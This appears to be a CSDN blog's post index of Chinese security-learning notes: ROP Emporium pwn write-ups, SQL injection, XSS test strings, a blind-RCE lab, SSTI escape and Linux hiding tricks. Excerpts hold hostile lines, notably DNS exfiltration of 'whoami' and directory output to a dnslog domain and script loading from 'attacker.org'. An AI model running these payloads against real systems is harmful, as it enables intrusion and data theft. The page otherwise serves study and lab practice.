devil8123665-CSDN博客

原创 r2pm -ci r2ghidra 时报错：checking pkg-config flags for r_core... no

进入目录/root/.local/share/radare2/r2pm/git/r2ghidra查看configure文件，查找报错位置。安装r2dec插件，使用pdd反编译。pdg反编译指令暂时搞不定。安装 libxxhash。

2023-06-12 11:48:37 1542

原创文件上传 .htaccess 与.user.ini

htaccess uesr.ini

2023-03-13 08:46:16 2291

在安恒杯看到了利用order by进行盲注，记得自己之前好像总结过order by后的注入方法，翻笔记发现确实是有一篇标题为order by注入的笔记，然而里面什么都没写。看了下详细信息，发现是17年8月11号创建的。真的是拖延症拖到忘记啊。order by是mysql中对查询数据进行排序的方法，使用示例这里的重点在于order by后既可以填列名或者是一个数字。举个例子： id是user表的第一列的列名，那么如果想根据id来排序，有两种写法:order by盲注结合union来盲注这

2022-06-22 12:56:14 1786

原创 python安全攻防11章远程控制代码修改

在书中源代码有点问题，经过调试修改如下：

2022-06-07 16:01:13 266

原创 UnicodeDecodeError: ‘utf-8‘ codec can‘t decode byte 0xc5 in position 13: invalid continuation byte

错误：UnicodeDecodeError: 'utf-8' codec can't decode byte 0xc5 in position 13: invalid continuation byte编码错误，主要是有中的编码例如：采用utf-8解码就会报错，可以使用GBK或者是“unicode_escape”进行解码参考网址：python 导入数据错误：UnicodeDecodeError: 'utf-8' codec can't decode byte 0xb5 in position 0

2022-06-06 22:51:06 10521 2

转载中间人攻击之ettercap嗅探

https://www.cnblogs.com/lingerhk/p/4094040.html

2022-06-03 10:10:24 126

转载 Sulley fuzzer learning

Sulley fuzzer learning---1 - 先知社区Sulley fuzzer learning---2 - 先知社区Sulley fuzzer learning---3 - 先知社区Sulley fuzzer learning---4 - 先知社区Sulley fuzzer learning---5 - 先知社区

2022-06-01 11:53:53 112

原创 m3u8加密文件原理及下载脚本

一、加密ts文件解密#EXTM3U#EXT-X-VERSION:3#EXT-X-MEDIA-SEQUENCE:0#EXT-X-ALLOW-CACHE:YES#EXT-X-TARGETDURATION:13#EXT-X-KEY:METHOD=AES-128,URI="https://j-island.net/movie/hls_key/s/857401e309d8a032c3bb18f4b09b8db2/?f=jj_20190401_hihijets_004",IV=0xaa3dcf6a7ac

2022-05-11 21:14:32 9693 2

转载 shodan python

为了开始使用Shodan的Python库，首先要确保你已经收到了API密钥。一旦完成，就可以通过以下方法来安装库:（注：API密钥可以通过注册shodan账户获得）$ easy_install shodan升级到最新版本：$ easy_install -U shodan由于向后兼容的特性，所以更新库始终是安全的。通常，库的新版本仅仅意味着有新的方法/特性可用。连接到api我们的代码中需要做的第一件事是初始化API对象：import shodanSHODAN_API_KEY

2022-04-28 21:33:01 896

转载 python中的scapy模块

文章目录模块简介基本用法 Scapy的基本操作 Scapy模块中的函数 Scapy模块的常用简单实例编写端口扫描器模块简介Scapy是一个由Python编写的强大工具，目前很多优秀的网络扫描攻击工具都使用了这个模块。也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。这个模块相对于Nmap来说，更为底层。可以更直观的了解网络中的各类扫描攻击行为。相对于Nmap来说，Scapy模块只会把收到的数据包展示给你，并不会告诉你

2022-04-26 22:00:33 1786

转载 python *args **kwargs

介绍在函数定义中，参数是指定给定函数可以接受的参数的命名实体。编程时，您可能并不知道代码的所有可能的用途，并且可能希望为将来使用该模块的程序员或者为用户与代码交互提供更多选择。我们可以通过在我们的代码中使用*args和**kwargs将可变数量的参数传递给函数。理解 *args （可变参数）在Python中，*args可以使用单星号形式作为参数将非密钥变长变量列表发送到函数。值得注意的是，星号（*）是这里的重要元素，因为这个词args是既定的常规习惯用法，尽管它不是由该语言强制执行的。

2022-04-25 21:36:20 179

转载 Python对列表去重的4种方法

Python对列表去重的4种方法列表去重开发中对数组、列表去重是非常常见的需求，对一个list中的id进行去重，有下面几种方法，前面两种方法不能保证顺序，后面两种方法可以保持原来的顺序。下面的代码都在Python3下测试通过， Python2下请自行测试1. 使用set的特型，python的set和其他语言类似, 是一个无序不重复元素集 1 2 3 4 orgList=[1,0,3,7,7,5] #list()方法是..

2022-04-25 21:26:33 10271

原创 java String字符串的内存地址

public class Main { public static void main(String args[]) { String s1 = "Runoob"; // String 直接创建 String s2 = "Runoob"; // String 直接创建 String s3 = s1; // 相同引用 String s4 = new String("Runoob"); /.

2022-04-21 11:00:23 2390

原创 piovt32 ROP Emporium

1、栈迁移由于某些条件限制先栈空间不足写长的ROP，需要把主要的ROP写到其他区域。在可写栈区域写一个短的ROP，完成跳转到长ROP区域，完成最终的代码执行。栈迁移有两种方法，方法一，通过两次 leave ret完成，方法二，通过控制栈顶寄存器esp，使其跳转到长ROP区域。方法一：汇编语言leave_ret指令 leave相当于mov esp ebp + pop ebp mov esp ebp操作指将ebp的值赋给esp，也就是让esp指向ebp所指的地方 pop ebp操作指将栈上ebp所指

2022-03-30 11:26:02 455

原创 x86,32位中为什么要做栈平衡。

在32位中是通过栈进行参数传递，正常函数的调用，栈中要先压入返回地址，再压入ebp。但通过溢出执行相关函数时，只压入ebp，并不压入返回地址，因此函数正常返回时，先后执行，leave，ret，就会多出栈一次，因此，需要做栈平衡正常调用溢出调用 leave（mov esp,ebp;pop ebp） ebp ebp ret(pop eip) 返回地址栈平衡 esp 通过代码调试代码如下：#include &

2022-03-29 18:00:32 891

原创 ret2csu ROP Emporium

14 ret2csu参考网址[原创]ret2csu学习-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.comROP Emporium - Ret2csu (x64) - blog.r0kithax.comROP Emporium ret2csu_白兰王的博客-CSDN博客ROP-Ret2csu详解 | 偏有宸机中级ROP之ret2csu_西杭的博客-CSDN博客WP现在的ROP Emporium一共有8题，后几道题相比过去的题有了一些变化，国内的新wp也是非常

2022-03-29 00:05:25 573

原创 ROP Emporium badchars32 wp

wp1 IDA进行分析发现溢出函数1、溢出函数int pwnme(){ unsigned int v1; // [esp+0h] [ebp-38h] unsigned int i; // [esp+4h] [ebp-34h] unsigned int j; // [esp+8h] [ebp-30h] char v4[36]; // [esp+10h] [ebp-28h] BYREF setvbuf(stdout, 0, 2, 0); puts("badchars..

2022-03-26 10:27:41 712

原创 ROP Emporium-write432 wp

write432 wpwp:ROPEmporium-WriteUp - ios's blogROP Emporium一系列题_Gzero__的博客-CSDN博客在以上的wp中，在usefulFunction函数中使用的是system函数，但是我拿到的题目中，在该函数中是print_file 函数，如下：int usefulFunction(){ return print_file("nonexistent");}所以只能自己一步一步测试。在write4 challeng

2022-03-24 21:22:41 355

原创 linux系统提权参考

1、实战Linux下三种不同方式的提权技巧 - 安全客，安全资讯平台2、对Linux 提权的简单总结：https://xz.aliyun.com/t/79243、Basic Linux Privilege Escalation - g0tmi1k4、GTFOBins

2021-12-09 22:09:32 213

原创 VulnHub breach1.0

配置靶机网络作者提示：The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.意思是靶机已经配置了静态IP地址为192.168.110.140，所以为了和靶机通行需要把kali主机的网卡设置一下。这里在virtualbox中可以配置一块新的网卡，为了在同一地址段，设置如下。然后让靶机和kali

2021-12-03 19:25:46 431

原创 kali的virtualbox、vm镜像账号密码

下载最新版本kali的virtualbox、vm镜像默认账号密码 root 密码 toor或者默认账号密码 kali密码kali

2021-11-28 17:38:59 8731

转载 Web中常见的绕过和技巧

参考文献Web中常见的绕过和技巧 - mrhonest - 博客园SQL注入十六进制绕过引号 slect table_name from information_schema.table where table_schema="sqli"; slect table_name from information_schema.table where table_schema=0x73716c69; slect table_name from information_.

2021-10-15 21:00:23 1020

原创零组文库，想用的抓紧

零组文库已经是关闭了，在网上找到了一个备份站点：主页 · 资料文库网页太多，就写了个脚本，但是，太多的请求访问，结果就访问不了了，脚本如下#!C:\Python3.7# -*- coding:utf-8 -*-import requestsfrom lxml import etreeimport osimport redef get_date(url): try: req =requests.get(url) req.encoding

2021-09-30 20:05:20 1474

转载 Nessus中文使用教程

https://www.wangan.com/docs/nessus

2021-06-17 09:53:29 10842

原创 lkwa-blind-rce盲打rce

1、blind-rce因为是盲打，数据不能带出，因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog站点：http://www.dnslog.cn/在盲打界面输入指令ping `whoami`.5w8un1.dnslog.cn提交后到dnslog中刷新记录可以看到如下图中所示用户为“application”针对根目录测试ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog....

2021-05-26 14:55:50 554

转载 Pikachu靶场----答案集合

题记这个靶场是在内推圈爷一个采访在顺风的一个安全小哥视频里那个小哥分享的，巧的是我当时正在找靶场，真是感觉有时候一些事情很奇妙，你刚好需要的时候它正好出现。此靶场名为皮卡丘靶场，可爱中透着一股霸气，搭建环境为phpstudy+mysql。可以在靶场里面玩玩kali，菜刀等高级渗透。我搭建的虚拟环境有win10，win8，linux。这篇文章属于我在网上查找的比较好的这个靶场答案解析，用于“日”后查阅。不定期更新。 Pikachu靶场----X...

2021-04-30 14:28:13 1267

原创 xss测试语句及测试站点总结

利用方法Script 标签Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本：<script>alert("XSS")</script><script src="http://attacker.org/malicious.js"></script>Src属性<img src=x onerror=prompt(1);><img/src=aaa.jpg onerror=prompt(1);><vi.

2021-04-09 09:31:09 4255

转载 linux下的几种隐藏技术

https://blog.csdn.net/whatday/article/details/1027541400x00 前言攻击者在获取服务器权限后，会通过一些技巧来隐藏自己的踪迹和后门文件，本文介绍Linux下的几种隐藏技术。0x01 隐藏文件Linux 下创建一个隐藏文件：touch .test.txttouch 命令可以创建一个文件，文件名前面加一个点就代表是隐藏文件,如下图：一般的Linux下的隐藏目录使用命令ls -l是查看不出来的，只能查看到文件及文件..

2021-03-10 09:44:27 330

转载 SSTI/沙盒逃逸详细总结

一 flask1 、基本用法>>> [].__class__.__base__<class 'object'>>>> [].__class__.__mro__(<class 'list'>, <class 'object'>)>>> [].__class__.__bases__(<class 'object'>,)2、取子类[].__class__.__base__.__sub

2021-03-09 20:13:57 1130

原创 GDB调试 | PWNDBG+PWNDBG联合使用

GDB调试 | PWNDBG+PWNDBG联合使用https://www.freesion.com/article/7871636857/本机调试：1、安装好pwndbg后在“~”目录有“.gdbinit”文件内容：# cat .gdbinitsource /home/giantbranch/pwndbg/gdbinit.py2、安装好Pwngdb后需要将该目录下的“.gdbinit”覆盖原来的".gdbinit"cd ~/git clone https://gith

2021-02-25 21:47:05 1155

转载栈基本原理

栈溢出原理和利用学习https://blog.csdn.net/sinat_31054897/article/details/82223889函数调用过程中函数栈详解https://blog.csdn.net/u012218309/article/details/81669227

2021-02-21 22:04:42 105

转载 php伪协议实现命令执行的七种姿势

首先归纳下常见的文件包含函数：include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file，计划对文件包含漏洞与php封装协议的利用方法进行总结，本篇先总结下一些封装协议，涉及的相关协议：file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data:/

2021-01-26 09:37:26 260

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

get-pip.py

TraceMe.rar

pixtopianbook107.rar

Nessus-7.0.1-debian6_amd64

DB32/T 1927-2011 政府信息系统安全防护基本要求

空空如也